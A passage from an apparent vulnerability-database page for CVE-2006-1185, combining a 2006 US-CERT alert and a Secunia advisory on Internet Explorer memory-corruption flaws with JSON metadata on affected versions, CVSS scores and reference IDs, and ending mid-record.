* Microsoft Internet Explorer
For more complete information, refer to the Microsoft Security Bulletin Summary for April 2006.
I. Description
Microsoft Security Bulletin Summary for April 2006 addresses vulnerabilities in Microsoft Windows and Internet Explorer. (CVE-2006-0012)
II. If the user is logged on with administrative privileges, the attacker could take complete control of an affected system. An attacker may also be able to cause a denial of service.
III. Solution
Apply Updates
Microsoft has provided updates for these vulnerabilities in the Security Bulletins and on the Microsoft Update site.
Workarounds
Please see the US-CERT Vulnerability Notes for workarounds. Many of these vulnerabilities can be mitigated by following the instructions listed in the Securing Your Web Browser document.
Appendix A. References
* Microsoft Security Bulletin Summary for April 2006 -
<http://www.microsoft.com/technet/security/bulletin/ms06-apr.mspx>
* US-CERT Vulnerability Note VU#876678 -
<http://www.kb.cert.org/vuls/id/876678>
* US-CERT Vulnerability Note VU#984473 -
<http://www.kb.cert.org/vuls/id/984473>
* US-CERT Vulnerability Note VU#434641 -
<http://www.kb.cert.org/vuls/id/434641>
* US-CERT Vulnerability Note VU#503124 -
<http://www.kb.cert.org/vuls/id/503124>
* US-CERT Vulnerability Note VU#959049 -
<http://www.kb.cert.org/vuls/id/959049>
* US-CERT Vulnerability Note VU#824324 -
<http://www.kb.cert.org/vuls/id/824324>
* US-CERT Vulnerability Note VU#341028 -
<http://www.kb.cert.org/vuls/id/341028>
* US-CERT Vulnerability Note VU#234812 -
<http://www.kb.cert.org/vuls/id/234812>
* US-CERT Vulnerability Note VU#641460 -
<http://www.kb.cert.org/vuls/id/641460>
* CVE-2006-1359 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1359>
* CVE-2006-1245 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1245>
* CVE-2006-1388 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1388>
* CVE-2006-1185 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1185>
* CVE-2006-1186 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1186>
* CVE-2006-1188 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1188>
* CVE-2006-1189 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1189>
* CVE-2006-0003 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003>
* CVE-2006-0012 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0012>
* Microsoft Update - <https://update.microsoft.com/microsoftupdate>
* Securing Your Web Browser -
<http://www.us-cert.gov/reading_room/securing_browser/#Internet_Ex
plorer>
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA06-101A.html>
Feedback can be directed to US-CERT Technical Staff. Please send email to cert@cert.org with "TA06-101A Feedback VU#876678" in the subject.
For instructions on subscribing to or unsubscribing from this mailing list, visit http://www.us-cert.gov/cas/signup.html.
Produced 2006 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
Revision History
Apr 11, 2006: Initial release
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux)
iQEVAwUBRDwj9n0pj593lg50AQInJggAoOBNa20SU8JukBoK5elr5vWOLcAjycHt Cg0+064ncCpQXoWiYPrLGVzg4/MCTVUygbYl85cePp5cHSHqpfuYXoBuZwSKu36+ olQdkbU1ejViA8A0XPsQ3EgtIRlDZSgL1ncYlRM8QxK8CF7QV616ta8q6H/3EDMM i+tXy6gzQMqJeUthopzGcfpf6U5Qu9PCk/+Pj66GfFhHpARanLef2H28WFRazC+I R+vLGLFLV0gp1Iy7t267l1BhN1w1z+fXD0WwYkiTwb0mzeize8Amdqlb5c4Vn4wh HAF/XGiCe5qkMhM7kRLA70JsNfSkI38JPHWSo9/a04wFBKENCAwNpA== =w6IC -----END PGP SIGNATURE----- .
Bist Du interessiert an einem neuen Job in IT-Sicherheit?
Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secunia_vacancies/
TITLE: Internet Explorer "javaprxy.dll" Memory Corruption Vulnerability
SECUNIA ADVISORY ID: SA15891
VERIFY ADVISORY: http://secunia.com/advisories/15891/
CRITICAL: Highly critical
IMPACT: DoS, System access
WHERE:
From remote
SOFTWARE: Microsoft Internet Explorer 6.x http://secunia.com/product/11/ Microsoft Internet Explorer 5.5 http://secunia.com/product/10/ Microsoft Internet Explorer 5.01 http://secunia.com/product/9/
DESCRIPTION: SEC Consult has reported a vulnerability in Microsoft Internet Explorer, which potentially can be exploited by malicious people to compromise a user's system. This can be exploited via a malicious web site to cause a memory corruption.
The vulnerability has been reported in versions 5.01, 5.5, and 6.0.
SOLUTION: The vendor recommends setting Internet and Local intranet security zone settings to "High".
PROVIDED AND/OR DISCOVERED BY: sk0L and Martin Eiszner, SEC Consult.
ORIGINAL ADVISORY: Microsoft: http://www.microsoft.com/technet/security/advisory/903144.mspx
SEC Consult: http://www.sec-consult.com/184.html
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200604-0209",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": null,
"scope": null,
"trust": 7.2,
"vendor": "microsoft",
"version": null
},
{
"model": "ie",
"scope": "eq",
"trust": 1.6,
"vendor": "microsoft",
"version": "6"
},
{
"model": "ie",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "5.01"
},
{
"model": "network camera server vb101",
"scope": "eq",
"trust": 1.0,
"vendor": "canon",
"version": "*"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "5.01"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "6 for windows server 2003"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "6 for windows server 2003 for itanium-based systems"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "6 for windows server 2003 x64 edition"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "6 for windows xp"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "6 for windows xp professional x64 edition"
},
{
"model": "internet explorer sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.1"
},
{
"model": "internet explorer sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.1"
},
{
"model": "internet explorer sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.1"
},
{
"model": "internet explorer sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.1"
},
{
"model": "internet explorer for windows nt",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.14.0"
},
{
"model": "internet explorer for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.198"
},
{
"model": "internet explorer for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.195"
},
{
"model": "internet explorer for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.12000"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.1"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "internet explorer for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.098"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#234812"
},
{
"db": "CERT/CC",
"id": "VU#876678"
},
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#641460"
},
{
"db": "CERT/CC",
"id": "VU#341028"
},
{
"db": "CERT/CC",
"id": "VU#503124"
},
{
"db": "CERT/CC",
"id": "VU#434641"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "BID",
"id": "17450"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000172"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-144"
},
{
"db": "NVD",
"id": "CVE-2006-1185"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:5.01:windows_2000_sp4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:*:windows_xp_professional_64bit:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_xpsp1:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_2000_sp4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1_itanium_systems:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_xp_sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:canon:network_camera_server_vb101:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-1185"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jan P. Monsch jan.monsch@csnc.ch",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200604-144"
}
],
"trust": 0.6
},
"cve": "CVE-2006-1185",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": true,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2006-1185",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-17293",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2006-1185",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#876678",
"trust": 0.8,
"value": "35.63"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#680526",
"trust": 0.8,
"value": "28.35"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#984473",
"trust": 0.8,
"value": "23.01"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#641460",
"trust": 0.8,
"value": "27.00"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#341028",
"trust": 0.8,
"value": "32.40"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#503124",
"trust": 0.8,
"value": "29.70"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#434641",
"trust": 0.8,
"value": "25.50"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#740372",
"trust": 0.8,
"value": "10.13"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#939605",
"trust": 0.8,
"value": "44.55"
},
{
"author": "CNNVD",
"id": "CNNVD-200604-144",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-17293",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#876678"
},
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#984473"
},
{
"db": "CERT/CC",
"id": "VU#641460"
},
{
"db": "CERT/CC",
"id": "VU#341028"
},
{
"db": "CERT/CC",
"id": "VU#503124"
},
{
"db": "CERT/CC",
"id": "VU#434641"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "VULHUB",
"id": "VHN-17293"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000172"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-144"
},
{
"db": "NVD",
"id": "CVE-2006-1185"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unspecified vulnerability in Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via certain invalid HTML that causes memory corruption. This can cause a variety of impacts, such as causing IE to crash. Microsoft Internet Explorer (IE) fails to properly handle HTA files. This vulnerability occurs when the browser parses invalid HTML. \nAttackers can exploit this vulnerability through a malicious web page or HTML email. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\n\n National Cyber Alert System\n\n Technical Cyber Security Alert TA06-101A\n\n\nMicrosoft Windows and Internet Explorer Vulnerabilities\n\n Original release date: April 11, 2006\n Last revised: --\n Source: US-CERT\n\n\nSystems Affected\n\n * Microsoft Windows\n * Microsoft Internet Explorer\n\n For more complete information, refer to the Microsoft Security\n Bulletin Summary for April 2006. \n\n\nI. Description\n\n Microsoft Security Bulletin Summary for April 2006 addresses\n vulnerabilities in Microsoft Windows and Internet Explorer. \n (CVE-2006-0012)\n\n\nII. If the user is logged on with\n administrative privileges, the attacker could take complete control of\n an affected system. An attacker may also be able to cause a denial of\n service. \n\n\nIII. Solution\n\nApply Updates\n\n Microsoft has provided updates for these vulnerabilities in the\n Security Bulletins and on the Microsoft Update site. \n\nWorkarounds\n\n Please see the US-CERT Vulnerability Notes for workarounds. Many of\n these vulnerabilities can be mitigated by following the instructions\n listed in the Securing Your Web Browser document. \n\nAppendix A. References\n\n * Microsoft Security Bulletin Summary for April 2006 -\n \u003chttp://www.microsoft.com/technet/security/bulletin/ms06-apr.mspx\u003e\n\n * US-CERT Vulnerability Note VU#876678 -\n \u003chttp://www.kb.cert.org/vuls/id/876678\u003e\n\n * US-CERT Vulnerability Note VU#984473 -\n \u003chttp://www.kb.cert.org/vuls/id/984473\u003e\n\n * US-CERT Vulnerability Note VU#434641 -\n \u003chttp://www.kb.cert.org/vuls/id/434641\u003e\n\n * US-CERT Vulnerability Note VU#503124 -\n \u003chttp://www.kb.cert.org/vuls/id/503124\u003e\n\n * US-CERT Vulnerability Note VU#959049 -\n \u003chttp://www.kb.cert.org/vuls/id/959049\u003e\n\n * US-CERT Vulnerability Note VU#824324 -\n \u003chttp://www.kb.cert.org/vuls/id/824324\u003e\n\n * US-CERT Vulnerability Note VU#341028 -\n \u003chttp://www.kb.cert.org/vuls/id/341028\u003e\n\n * US-CERT Vulnerability Note VU#234812 -\n \u003chttp://www.kb.cert.org/vuls/id/234812\u003e\n\n * US-CERT Vulnerability Note VU#641460 -\n \u003chttp://www.kb.cert.org/vuls/id/641460\u003e\n\n * CVE-2006-1359 -\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1359\u003e\n\n * CVE-2006-1245 -\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1245\u003e\n\n * CVE-2006-1388 -\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1388\u003e\n\n * CVE-2006-1185 -\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1185\u003e\n\n * CVE-2006-1186 -\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1186\u003e\n\n * CVE-2006-1188 -\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1188\u003e\n\n * CVE-2006-1189 -\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1189\u003e\n\n * CVE-2006-0003 -\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003\u003e\n\n * CVE-2006-0012 -\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0012\u003e\n\n * Microsoft Update - \u003chttps://update.microsoft.com/microsoftupdate\u003e\n\n * Securing Your Web Browser -\n \u003chttp://www.us-cert.gov/reading_room/securing_browser/#Internet_Ex\n plorer\u003e\n\n\n ____________________________________________________________________\n\n The most recent version of this document can be found at:\n\n \u003chttp://www.us-cert.gov/cas/techalerts/TA06-101A.html\u003e\n ____________________________________________________________________\n\n Feedback can be directed to US-CERT Technical Staff. Please send\n email to \u003ccert@cert.org\u003e with \"TA06-101A Feedback VU#876678\" in the\n subject. \n ____________________________________________________________________\n\n For instructions on subscribing to or unsubscribing from this\n mailing list, visit \u003chttp://www.us-cert.gov/cas/signup.html\u003e. \n ____________________________________________________________________\n\n Produced 2006 by US-CERT, a government organization. \n\n Terms of use:\n\n \u003chttp://www.us-cert.gov/legal.html\u003e\n ____________________________________________________________________\n\n\nRevision History\n\n Apr 11, 2006: Initial release\n\n\n\n\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.2.1 (GNU/Linux)\n\niQEVAwUBRDwj9n0pj593lg50AQInJggAoOBNa20SU8JukBoK5elr5vWOLcAjycHt\nCg0+064ncCpQXoWiYPrLGVzg4/MCTVUygbYl85cePp5cHSHqpfuYXoBuZwSKu36+\nolQdkbU1ejViA8A0XPsQ3EgtIRlDZSgL1ncYlRM8QxK8CF7QV616ta8q6H/3EDMM\ni+tXy6gzQMqJeUthopzGcfpf6U5Qu9PCk/+Pj66GfFhHpARanLef2H28WFRazC+I\nR+vLGLFLV0gp1Iy7t267l1BhN1w1z+fXD0WwYkiTwb0mzeize8Amdqlb5c4Vn4wh\nHAF/XGiCe5qkMhM7kRLA70JsNfSkI38JPHWSo9/a04wFBKENCAwNpA==\n=w6IC\n-----END PGP SIGNATURE-----\n. \n\n----------------------------------------------------------------------\n\nBist Du interessiert an einem neuen Job in IT-Sicherheit?\n\n\nSecunia hat zwei freie Stellen als Junior und Senior Spezialist in IT-\nSicherheit:\nhttp://secunia.com/secunia_vacancies/\n\n----------------------------------------------------------------------\n\nTITLE:\nInternet Explorer \"javaprxy.dll\" Memory Corruption Vulnerability\n\nSECUNIA ADVISORY ID:\nSA15891\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/15891/\n\nCRITICAL:\nHighly critical\n\nIMPACT:\nDoS, System access\n\nWHERE:\n\u003eFrom remote\n\nSOFTWARE:\nMicrosoft Internet Explorer 6.x\nhttp://secunia.com/product/11/\nMicrosoft Internet Explorer 5.5\nhttp://secunia.com/product/10/\nMicrosoft Internet Explorer 5.01\nhttp://secunia.com/product/9/\n\nDESCRIPTION:\nSEC Consult has reported a vulnerability in Microsoft Internet\nExplorer, which potentially can be exploited by malicious people to\ncompromise a user\u0027s system. \nThis can be exploited via a malicious web site to cause a memory\ncorruption. \n\nThe vulnerability has been reported in versions 5.01, 5.5, and 6.0. \n\nSOLUTION:\nThe vendor recommends setting Internet and Local intranet security\nzone settings to \"High\". \n\nPROVIDED AND/OR DISCOVERED BY:\nsk0L and Martin Eiszner, SEC Consult. \n\nORIGINAL ADVISORY:\nMicrosoft:\nhttp://www.microsoft.com/technet/security/advisory/903144.mspx\n\nSEC Consult:\nhttp://www.sec-consult.com/184.html\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2006-1185"
},
{
"db": "CERT/CC",
"id": "VU#234812"
},
{
"db": "CERT/CC",
"id": "VU#876678"
},
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#984473"
},
{
"db": "CERT/CC",
"id": "VU#641460"
},
{
"db": "CERT/CC",
"id": "VU#341028"
},
{
"db": "CERT/CC",
"id": "VU#503124"
},
{
"db": "CERT/CC",
"id": "VU#434641"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000172"
},
{
"db": "BID",
"id": "17450"
},
{
"db": "VULHUB",
"id": "VHN-17293"
},
{
"db": "PACKETSTORM",
"id": "45345"
},
{
"db": "PACKETSTORM",
"id": "38386"
}
],
"trust": 9.36
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-17293",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-17293"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#503124",
"trust": 3.4
},
{
"db": "NVD",
"id": "CVE-2006-1185",
"trust": 2.9
},
{
"db": "BID",
"id": "17450",
"trust": 2.8
},
{
"db": "USCERT",
"id": "TA06-101A",
"trust": 2.6
},
{
"db": "SECUNIA",
"id": "18957",
"trust": 2.5
},
{
"db": "CERT/CC",
"id": "VU#959049",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2006-1318",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1015900",
"trust": 1.7
},
{
"db": "CERT/CC",
"id": "VU#740372",
"trust": 1.6
},
{
"db": "CERT/CC",
"id": "VU#939605",
"trust": 1.6
},
{
"db": "CERT/CC",
"id": "VU#680526",
"trust": 1.6
},
{
"db": "CERT/CC",
"id": "VU#234812",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#876678",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#984473",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#641460",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#341028",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#434641",
"trust": 0.9
},
{
"db": "SECUNIA",
"id": "15891",
"trust": 0.9
},
{
"db": "SECUNIA",
"id": "19583",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "18680",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "16373",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "19269",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "19606",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "19378",
"trust": 0.8
},
{
"db": "BID",
"id": "17181",
"trust": 0.8
},
{
"db": "BID",
"id": "14594",
"trust": 0.8
},
{
"db": "XF",
"id": "21895",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014727",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "16480",
"trust": 0.8
},
{
"db": "XF",
"id": "21193",
"trust": 0.8
},
{
"db": "BID",
"id": "14087",
"trust": 0.8
},
{
"db": "OSVDB",
"id": "17680",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014329",
"trust": 0.8
},
{
"db": "USCERT",
"id": "SA06-101A",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000172",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200604-144",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "1838",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-17293",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#824324",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "45345",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "38386",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#234812"
},
{
"db": "CERT/CC",
"id": "VU#876678"
},
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#984473"
},
{
"db": "CERT/CC",
"id": "VU#641460"
},
{
"db": "CERT/CC",
"id": "VU#341028"
},
{
"db": "CERT/CC",
"id": "VU#503124"
},
{
"db": "CERT/CC",
"id": "VU#434641"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "VULHUB",
"id": "VHN-17293"
},
{
"db": "BID",
"id": "17450"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000172"
},
{
